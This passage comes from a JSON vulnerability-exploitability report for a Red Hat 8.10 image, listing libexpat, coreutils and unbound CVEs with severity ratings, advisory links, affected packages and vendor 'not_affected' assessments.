          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56131",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libexpat before 2.8.2 lacks handler call depth tracking for calls to XML_ResumeParser from within handlers in cases of a policy violation. Thus, a use-after-free can occur (similar to the CVE-2026-50219 situation).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56131"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56131"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1267"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56131"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56131"
        }
      ],
      "published": "2026-06-19T06:17:10+00:00",
      "updated": "2026-06-23T20:15:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56132",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        821
      ],
      "description": "In libexpat before 2.8.2, there is a heap-based buffer overflow in doProlog in xmlparse.c because scaffold backing array reallocation is mishandled when there is data-structure sharing across parsers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56132"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56132"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1272"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56132"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56132"
        }
      ],
      "published": "2026-06-19T06:17:10+00:00",
      "updated": "2026-06-23T20:15:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56391",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        125
      ],
      "description": "GNU coreutils uniq is vulnerable to an out\u2011of\u2011bounds read due to incorrect handling of multibyte input when the -w (--check-chars) option is used. The find_field() function miscalculates the byte length of characters by repeatedly processing a fixed pointer instead of advancing through the input, resulting in an inflated length value. \nThis incorrect length is later used in a memcmp operation, causing reads beyond the allocated buffer when processing crafted multibyte input.\n\nWhen running GNU coreutils uniq with attacker-provided arguments, this behavior leads to a crash and potential adjacent heap memory exposure.\n\n\nThis issue has been fixed in the commit d64e35a8a4c0e4608321433e0d84d917e4e36371.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56391"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56391"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-56391"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=d64e35a8a4c0e4608321433e0d84d917e4e36371"
        },
        {
          "url": "https://github.com/advisories/GHSA-7xvj-m9x7-qgxq"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56391"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56391"
        }
      ],
      "published": "2026-07-24T09:16:25+00:00",
      "updated": "2026-07-30T16:28:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.30-17.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56392",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
        }
      ],
      "cwes": [
        122
      ],
      "description": "GNU coreutils unexpand is vulnerable to a heap-based buffer overflow due to an integer overflow during buffer allocation when processing large tab stop (-t) values. The multiplication used to calculate the allocation size can wrap around, resulting in an undersized buffer.\nWhen processing crafted input, subsequent writes exceed the allocated memory, leading to an out\u2011of\u2011bounds heap write.\n\nWhen running GNU coreutils unexpand with attacker-provided large tab stop (-t) arguments, this behavior leads to a crash and potentially achieve a heap write primitive depending on memory layout.\n\n\n\n\n\n\n\n\n\n\nThis issue has been fixed in the commit b60a159fdc5bfcf9988d3a4cb6f53abe8ad5d35d",
      "recommendation": "Upgrade coreutils-single to version 8.30-20.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56392"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56392"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-56391"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=b60a159fdc5bfcf9988d3a4cb6f53abe8ad5d35d"
        },
        {
          "url": "https://github.com/advisories/GHSA-g24f-m2hx-pfgx"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56392"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56392"
        }
      ],
      "published": "2026-07-24T09:16:25+00:00",
      "updated": "2026-07-30T16:28:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.30-17.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
